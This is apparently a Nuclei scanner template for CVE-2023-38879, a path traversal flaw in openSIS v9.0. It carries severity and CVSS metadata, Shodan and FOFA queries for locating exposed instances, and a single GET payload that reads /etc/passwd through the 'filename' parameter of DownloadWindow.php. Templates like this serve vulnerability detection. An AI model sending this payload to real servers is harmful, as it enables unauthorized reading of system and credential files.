A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
PoC代码[已公开]
id: CVE-2023-38879
info:
name: openSIS v9.0 - Path Traversal
author: haliteroglu
severity: high
description: |
A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
reference:
- https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2023-38879
- https://nvd.nist.gov/vuln/detail/CVE-2023-38879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-38879
cwe-id: CWE-22
epss-score: 0.14502
epss-percentile: 0.94194
cpe: cpe:2.3:a:os4ed:opensis:9.0:*:*:*:community:*:*:*
metadata:
verified: true
max-request: 1
vendor: os4ed
product: opensis
shodan-query: title:"openSIS"
fofa-query: title="openSIS"
tags: cve,cve2023,opensis,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/DownloadWindow.php?filename=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "filename="
- "text/html"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100dc4fef59c8bfef2aaec25a8c2501c5cfca1117e318497f569dbee5a077e7303c02201a89ec0c6878c7d14c6e8117e4004bf04e7dca160a0bbfaab1f436d8975eb039:922c64590222798bb761d5b6d8e72950